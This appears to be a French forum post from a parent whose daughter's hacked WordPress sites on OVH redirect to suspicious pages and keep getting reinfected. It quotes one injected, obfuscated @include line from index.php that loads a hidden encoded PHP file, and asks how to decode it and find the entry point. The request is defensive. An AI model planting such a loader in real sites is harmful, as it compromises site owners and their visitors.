Bonjour,
Ma fille a 2 sites en multisites chez OVH qui ont été piratés. Il en résulte des redirections sur des sites suspects.
J'ai changé les mots de passes OVH et FTP. Malgré ces changements et mon nettoyage de fichiers par ftp le lendemain ces fichiers sont de nouveaux infectés et mis en chmod 0755
Il doit y avoir une porte d'entrée que je ne trouve pas. Mon PC a été nettoyé.
Des codes ont été rajoutés par exemple dans index.php
@include /*hjbu0*/("/home/sagessedgv/www/wp\x2dincl\x75des/widgets/.bf503845.oti");
Ce fichier ".bf503845.oti" contient du php que je n'arrive pas à lire (encodage).
Je l'ai enregistré en php pour pouvoir le joindre
Comment interpréter ce fichier ?
Comment trouver la porte d'entrée ?
Partager